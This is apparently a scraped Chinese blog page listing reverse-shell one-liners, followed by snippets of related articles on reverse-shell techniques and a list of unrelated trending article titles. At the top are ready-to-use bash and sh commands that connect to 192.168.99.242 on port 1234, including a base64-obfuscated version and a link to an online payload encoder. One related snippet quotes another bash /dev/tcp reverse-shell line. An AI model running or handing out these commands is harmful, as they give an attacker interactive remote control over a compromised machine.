bash -i >& /dev/tcp/192.168.99.242/1234 0>&1

base64版：bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'
在线编码地址：http://www.jackson-t.ca/runtime-exec-payloads.html

exec 5<>/dev/tcp/192.168.99.242/1234;cat <&5 | while read line; do $line 2>&5 >&5;done
exec /bin/sh 0</dev/tcp/192.168.99.242/1234 1>&0 2>&0

反弹shell的各种姿势相关推荐

1. 带你了解LINUX反弹Shell的各种姿势(超详细)

   简介 LInux反弹Shell(Reveser Shell), 也可以称为反向Shell, 由被控制端主动向控制端发送请求建立通讯, 随后将执行命令的结果输出到控制端, 本质上是网络概念的客户端与服务 ...

2. 【好文转载】linux反弹shell的各种姿势

   本文为转载,原作者与链接如下: 作者:@11阳光 https://www.cnblogs.com/sunny11/p/14290092.html 题记 搞完xss钓鱼一时不知道服务器还能干点什么,然后 ...

3. python反弹shell_反弹shell的各种姿势

   在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入. 反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步.所有姿势 ...

4. 反弹shell的十种姿势

   bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ,注意这个是由解析shell的bash完成,所以某些情况下不支持 perl版本 ...

5. 反弹shell的N种姿势

   目录 前言: 一.Bash反弹 1.1 方法一 1.2 方法二 1.3 方法三 二. telnet反弹 2.1 方法一 2.2 方法二 三.nc(netcat)反弹 四.常见的脚本反弹 4.1 pyt ...

6. windows 反弹shell_容器内反弹shell的51种姿势

   什么是反弹shell? 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端.reverse shell与tel ...

7. java Runtime.getRuntime().exec 获取反弹shell

   说明 前面写了一篇在Java环境下获取shell的文章.当时使用的语句是: Runtime r = Runtime.getRuntime(); Process p = r.exec(new Strin ...

8. linux下几种反弹Shell方法的总结与理解

   实验环境 CentOS 6.5:192.168.0.3 kali2.0:192.168.0.4 方法1: 反弹shell命令如下: bash -i >& /dev/tcp/ip/port ...

9. cmd管道无法接收特定程序返回值_渗透不会反弹shell？来教你写一个cmd的shell

   渗透不会反弹shell?来教你写一个cmd的shell 包含的库: #include #include #include #include #include #pragma comment(lib, ...

10. 反弹shell的总结

    前言 ctf中经常执行命令没有回显,需要进行反弹shell,而不同的环境反弹shell的姿势也不尽相同,所以就在这里总结一下,自己以后遇到了什么新的姿势都会加进来. 比较常见的姿势 比较常见的基本就是 ...

最新文章

1. tf.variable_scope 参数
2. 使用libjpeg进行图片压缩（哈夫曼算法,无损压缩）
3. TLS回调函数（2）
4. C#session共享+redis_Shiro权限管理框架（二）：Shiro结合Redis实现分布式环境下的Session共享...
5. 因为阿里，他们成了“杭漂”
6. 支持html5特性的浏览器,HTML 5浏览器的支持情况
7. LeetCode 2105. 给植物浇水 II（双指针）
8. Intel Skylake (Client) 架构/微架构/流水线 (2) - 前端
9. 【Git】error: RPC
10. python零基础学习书-Python零基础到进阶必读的书藉：Python学习手册pdf免费下载
11. javascript里new构造函数返回的值
12. 《NX-OS与Cisco Nexus交换技术：下一代数据中心架构（第2版）》一2.9　本章小结...
13. php中联合运算符,PHP-串联运算符
14. CSDN新手机号绑定不成功，提示已存在账号，CSDN换绑手机号的相关问题
15. vue项目富文本编辑器输入格式化以计算总字数
16. 思科交换机接口配置trunk_cisco二层交换机和三层交换机怎么设置trunk
17. oracle的显示和隐式,oracle的显式受权和隐式授权（转）
18. 从我开发的深度学习框架看深度学习这几年：TensorFlow, PaddlePaddle（飞桨）, 无量...
19. 如何在Ubuntu上方便使用OpenAI API key
20. Java 超.简易RPG游戏

热门文章

1. Oracle怎么清除视图数据,Oracle删除视图
2. 5G商用牌照发放，区块链与5G能擦出多大“火”
3. vue switch组件
4. 两个网卡做映射linux,linux多网卡的路由模式和桥接模式设置方法
5. POJ 1862 Stripies 贪心
6. “启用宏的幻灯片”是什么意思
7. bs4爬取笔趣阁小说
8. 科研狗工具大合集，赶紧集合看过来
9. 用word快速将数字字体换成新罗马详细简单方法
10. 谈逻辑与数学界线之淡化(修正版)